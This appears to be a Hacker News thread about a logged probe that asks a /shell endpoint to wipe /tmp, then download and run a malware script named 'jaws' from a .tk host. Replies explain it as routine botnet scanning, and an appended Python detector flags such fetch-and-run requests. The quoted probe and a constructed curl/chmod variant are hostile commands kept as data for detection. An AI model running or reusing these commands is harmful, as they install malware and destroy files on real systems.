
Ask HN: An Attempted Hack from 112.168.59.114 - 191101
Trundling through the production logs, I found this, which looks like an attempted hack from WELOVEURLHAUSBOT.zerohoes.tk. I'm not sure what the jaws file does, but anything called 'jaws' is probably not benign. I highly appreciate any advice on how to strengthen security in light of this.

Started GET "/shell?cd+/tmp;rm+-rf+*;wget+http://WELOVEURLHAUSBOT.zerohoes.tk/jaws;sh+/tmp/jaws"
======
Nextgrid
It's just the Internet's "background noise", lots of compromised machines try
to attack others. Any well-designed application will be immune to this.

This particular attempt isn't cutting-edge and isn't trying to exploit some
obscure vulnerability. They're not even "exploiting" anything, they are
literally probing for an endpoint that is designed to happily execute any
shell command passed to it (because I guess someone somewhere was stupid
enough to implement something like this?). This is the digital equivalent of
"asking nicely".

They're trying to download a malicious shell script to the /tmp folder (that
will in turn download more malware, most likely a cryptocurrency miner) and
run it. Looking at the script (which is still available as of now), it makes
many attempts to download different variations of a malicious executable, each
compiled for a different architecture. The list of architectures is quite
broad (PPC and M68K even) so on that front they've done their job very
thoroughly to maximize the potential yield.

~~~
191101
This was very helpful thank you. I found it odd that the attack was so
'blunt', for lack of a better word, and thought I may be missing something.

------
jaclaz
>but anything called 'jaws' is probably not benign

Not always; just for the record, JAWS is actually the name of a common program
that reads the screen for visually impaired people:

[https://www.freedomscientific.com/products/software/jaws/](https://www.freedomscientific.com/products/software/jaws/)

Of course this has nothing to do with your case.

------
jamieweb
The tk, gq, cf, ml and ga TLDs offer free registration, so they're widely used
in scams and fraud.

In most cases you can safely block all traffic to/from them, as well as email
addresses using them.

------
obverse
Do you have a route for '/shell' ?

~~~
191101
I don't but per the previous reply, I imagine this would've been quite bad =))
I can't really think of why someone would create an API that exposes a shell
to anyone asking.

~~~
bjourne
The script is probably probing for already compromised machines.

------
sarcasmatwork
fail2ban

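As an added example (not code from the thread or from any poster), here is the detection logic the replies above add up to: decode the `/shell?...` query the way the probed endpoint would, split it into the shell commands it asks for (the "asking nicely" Nextgrid describes), flag the download-then-execute chain, mark download hosts on the free TLDs jamieweb lists, and emit the client IPs a fail2ban-style jail (sarcasmatwork) would act on. The log lines are constructed; the Rails-style `Started GET "..." for <ip> at <time>` layout, the trailing IP and timestamp fields, the second probe with `curl`, and all function and constant names are assumptions, not from the post. It goes beyond the single probe in the thread by also catching the `curl`/`chmod`/direct-execute variant of the same pattern.

```python
"""Flag shell-injection probes like the one in the post and list the IPs to ban.

Added example, not code from the thread. The log layout (Rails-style
'Started GET "..." for <ip> at <time>') is assumed; the OP's line is truncated
after the path, so the IP/time fields here are constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# TLDs with free registration, per jamieweb's comment; used as an indicator only.
FREE_TLDS = {"tk", "gq", "cf", "ml", "ga"}
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
INTERPRETERS = {"sh", "bash", "ash", "chmod"}
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

LOG_RE = re.compile(r'^Started (?P<method>\w+) "(?P<target>[^"]*)" for (?P<ip>\S+)')
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")
CMD_SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")

# Constructed sample log, not real traffic. Line 2 reproduces the probe from the post;
# line 4 is a constructed curl/chmod variant of the same fetch-and-run pattern.
SAMPLE_LOG = """\
Started GET "/" for 203.0.113.7 at 2019-11-01 09:59:58 +0000
Started GET "/shell?cd+/tmp;rm+-rf+*;wget+http://WELOVEURLHAUSBOT.zerohoes.tk/jaws;sh+/tmp/jaws" for 112.168.59.114 at 2019-11-01 10:00:01 +0000
Started GET "/search?q=jaws+screen+reader" for 198.51.100.9 at 2019-11-01 10:00:05 +0000
Started GET "/cgi-bin/test?curl+-o+/tmp/x+http://198.51.100.5/x;chmod+777+/tmp/x;/tmp/x" for 192.0.2.44 at 2019-11-01 10:00:09 +0000
"""


def decode_commands(target):
    """Return (path, [commands]) with the query decoded as the probed endpoint would see it."""
    parts = urlsplit(target)
    decoded = unquote_plus(parts.query)  # "+" and %XX become spaces / literal bytes
    cmds = [c.strip() for c in CMD_SPLIT_RE.split(decoded) if c.strip()]
    return parts.path, cmds


def analyze_target(target):
    """Return a finding dict if the request is a fetch-and-run shell probe, else None."""
    path, cmds = decode_commands(target)
    indicators = set()
    urls = []
    for cmd in cmds:
        argv = cmd.split()
        if not argv:
            continue
        head = argv[0]
        if head in DOWNLOADERS:
            found = URL_RE.findall(cmd)
            if found:
                indicators.add("remote_download")
                urls.extend(found)
        # "sh /tmp/jaws", "chmod 777 /tmp/x" or running "/tmp/x" directly
        if (head in INTERPRETERS and any(a.startswith(SCRATCH_DIRS) for a in argv[1:])) \
                or head.startswith(SCRATCH_DIRS):
            indicators.add("exec_from_scratch_dir")
    for url in urls:
        host = urlsplit(url).hostname or ""  # hostname is lowercased by urlsplit
        if host.rsplit(".", 1)[-1] in FREE_TLDS:
            indicators.add("free_tld_host")
    # A lone URL or a lone /tmp path is not enough; require the download-then-execute chain.
    if {"remote_download", "exec_from_scratch_dir"} <= indicators:
        return {"path": path, "commands": cmds, "urls": urls, "indicators": sorted(indicators)}
    return None


def scan_log(text):
    """Return one finding per suspicious log line, tagged with the client IP."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_target(m.group("target"))
        if finding:
            finding["ip"] = m.group("ip")
            findings.append(finding)
    return findings


def ban_candidates(findings):
    """Deduplicated, sorted client IPs that a fail2ban-style jail would act on."""
    return sorted({f["ip"] for f in findings})


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h["ip"], h["path"], h["indicators"], h["urls"])
    print("ban:", ban_candidates(hits))
```

Requiring both a download and an execute-from-scratch-dir step keeps ordinary requests such as the `/search?q=jaws+screen+reader` line (jaclaz's point that the word alone means nothing) out of the ban list. The same `LOG_RE` pattern, with `<HOST>` in place of the `(?P<ip>\S+)` group, is the shape a fail2ban `failregex` takes if you want the ban applied at the firewall rather than in a script.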
